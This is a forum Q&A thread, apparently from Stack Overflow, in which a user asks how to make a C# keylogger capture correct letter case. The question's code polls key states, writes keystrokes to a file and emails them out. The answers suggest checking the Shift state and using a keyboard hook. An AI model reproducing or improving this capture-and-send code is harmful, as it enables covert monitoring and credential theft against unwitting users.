# How to capture keystrokes without caps lock?

Tags: c#, winforms, keystroke, keylogger

I'm making a winforms program that will capture whatever I type into a textfile, but it makes all characters caps-locked. How can I make it capture them as they are typed in?
For example if i type AbCdEf it puts out ABCDEF in the textbox...

```
[DllImport("User32.dll")]
private static extern short GetAsyncKeyState(int vKey);

    private void WriteTotxt(string value)
    {
        StreamWriter str = new StreamWriter("test.txt", true);
        str.Write(value);
        str.Close();
    }

    private void timer1_Tick(object sender, EventArgs e)
    {
        string buffer = "";
        foreach (System.Int32 i in Enum.GetValues(typeof(Keys)))
        {
            if(GetAsyncKeyState(i) == -32767)
                buffer += Enum.GetName(typeof(Keys), i);
        }
        text += buffer;
        if (text.Length > 0)
        {
        WriteTotxt(text);
        text = replaceChars(text);
        Email.Send(text);
        text = "";
        }
    }
```

Comment: -1 for the keylogger tag

Answer (score 1):

GetAsyncKeyState only returns if the state of the key. It doesn't mention anything about the modifiers: Shift, Alt etc. So either you check if with GetAsyncKeyState if the shift key is down and store that in a boolean. When you log the keys and the shift is down you note it as capital. If not then lowercase.

```
bool shiftDown = GetAsyncKeyState(Keys.Shift) == -32767; 

foreach (...)
{
    if (GetAsyncKeyState(i) == -32767)
    {
        var key = i.ToString();
        buffer += shiftDown ? i : i.ToLower();
    }
}
```

Also I really advise you to read the documentation and if you want to check all keys do not use GetAsyncKeyState, use a keyboard hook. More information (example): [Here](http://blogs.msdn.com/b/toub/archive/2006/05/03/589423.aspx). Because you iterate through all the keys very fast, it is not efficient at all. With a keyboardhook a callback gets fired when a key is pressed.

Comment: Yes, keyboard hook is the way to go. There are legitimate uses for it, I used the code from that very article when writing [KeyMapper](http://code.google.com/p/keymapper), though in the back of my brain there was an issue with the LowLevelKeyboardProc delegate being GCd..

Answer (score 0):

As other people have mentioned, I hesitate to get into this, since keylogging doesn't usually end well, but (a) the software is already on the market and (b) it's not like the information isn't already freely available on MSDN, so...

It's not that you're getting the wrong information.  You're looking for incomplete information, only asking for the letter *key* statuses.  As the [`GetAsyncKeyState()` page](http://msdn.microsoft.com/en-us/library/windows/desktop/ms646293%28v=vs.85%29.aspx) explains, you need to also check the modifier keys, `VK_SHIFT`, `VK_CONTROL`, `VK_MENU`, and so on, to know if they're active.

Answer (score -3):

Use de event Key press to convert the keystroke to capital using ToUpper();

[More información about event keypress here](http://msdn.microsoft.com/es-es/library/system.windows.forms.control.keypress%28v=vs.110%29.aspx)

Comment: ToUpper() ? That's what the OP is trying to avoid